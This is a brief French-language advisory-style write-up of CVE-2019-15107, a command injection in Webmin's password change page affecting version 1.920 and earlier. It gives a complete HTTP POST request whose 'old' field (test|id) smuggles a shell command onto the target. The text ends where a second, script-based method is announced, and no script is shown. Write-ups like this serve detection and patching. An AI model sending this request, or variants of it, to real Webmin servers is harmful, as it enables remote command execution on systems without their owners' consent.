CVE-2019-15107: Exploit Modules Available for Remote Code Execution Vulnerability in Webmin
- Description de la vulnérabilité
Webmin est un outil de gestion système puissant basé sur le Web, largement utilisé sur les systèmes Unix. En raison du processus de traitement des requêtes de Password_Change.cgi dans Webmin, le paramètre old présente une vulnérabilité d'injection de commandes qui peut être exploitée par des attaquants. Lorsque la fonction de réinitialisation de mot de passe Webmin est activée, un attaquant peut utiliser cette vulnérabilité pour exécuter des commandes arbitraires sur des systèmes vulnérables, obtenant ainsi un accès shell.
Versions concernées :
Webmin 1.920 et versions antérieures
- Exploitation de la vulnérabilité
Méthode 1 : Détection manuelle
Accédez à la page et ignorez le certificat pour voir la page de connexion de Webmin.

Envoyez le paquet de données suivant pour exécuter la commande id :
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

Méthode 2 : Utilisation d'un script
